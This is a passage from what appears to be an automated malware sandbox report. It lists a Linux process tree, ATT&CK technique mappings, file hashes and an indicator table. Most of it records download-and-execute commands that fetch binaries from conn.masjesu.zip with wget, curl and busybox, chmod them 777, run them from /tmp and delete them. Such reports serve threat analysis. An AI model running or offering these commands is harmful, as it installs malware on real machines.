  rm RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
  2⤵
  PID:967
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
  2⤵
  - System Network Configuration Discovery
  PID:968
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:969
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
  2⤵
  - System Network Configuration Discovery
  PID:971
- /bin/chmod
  chmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
  2⤵
  - File and Directory Permissions Modification
  PID:972
- /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
  ./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
  2⤵
  - Executes dropped EXE
  PID:973
- /bin/rm
  rm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
  2⤵
  PID:974
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
  2⤵
  - System Network Configuration Discovery
  PID:975
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:976
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
  2⤵
  - System Network Configuration Discovery
  PID:978
- /bin/chmod
  chmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
  2⤵
  - File and Directory Permissions Modification
  PID:979
- /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
  ./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
  2⤵
  - Executes dropped EXE
  PID:980
- /bin/rm
  rm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
  2⤵
  PID:981
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
  2⤵
  - System Network Configuration Discovery
  PID:982
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:983
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
  2⤵
  - System Network Configuration Discovery
  PID:985
- /bin/chmod
  chmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
  2⤵
  - File and Directory Permissions Modification
  PID:986
- /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
  ./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
  2⤵
  - Executes dropped EXE
  PID:987
- /bin/rm
  rm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
  2⤵
  PID:988
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
  2⤵
  - System Network Configuration Discovery
  PID:989
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:990
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
  2⤵
  - System Network Configuration Discovery
  PID:992
- /bin/chmod
  chmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
  2⤵
  - File and Directory Permissions Modification
  PID:993
- /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
  ./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
  2⤵
  - Executes dropped EXE
  PID:994
- /bin/rm
  rm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
  2⤵
  PID:995
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
  2⤵
  - System Network Configuration Discovery
  PID:996
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:997
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
  2⤵
  - System Network Configuration Discovery
  PID:999
- /bin/chmod
  chmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
  2⤵
  - File and Directory Permissions Modification
  PID:1000
- /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
  ./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
  2⤵
  - Executes dropped EXE
  PID:1001
- /bin/rm
  rm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
  2⤵
  PID:1002
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
  2⤵
  - System Network Configuration Discovery
  PID:1003
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1004
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
  2⤵
  - System Network Configuration Discovery
  PID:1006
- /bin/chmod
  chmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
  2⤵
  - File and Directory Permissions Modification
  PID:1007
- /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
  ./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
  2⤵
  - Executes dropped EXE
  PID:1008
- /bin/rm
  rm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
  2⤵
  PID:1009

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	Process
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY	741	jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD	748	vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa	765	vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx	798	I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL	814	MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I	837	zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo	861	ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa	868	YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a	875	Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp	882	MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR	889	Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p	896	hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA	903	W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY	910	RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo	917	ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa	924	YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a	931	Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp	938	MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR	945	Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p	952	hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA	959	W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY	966	RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY	973	jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD	980	vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa	987	vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx	994	I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL	1001	MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I	1008	zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I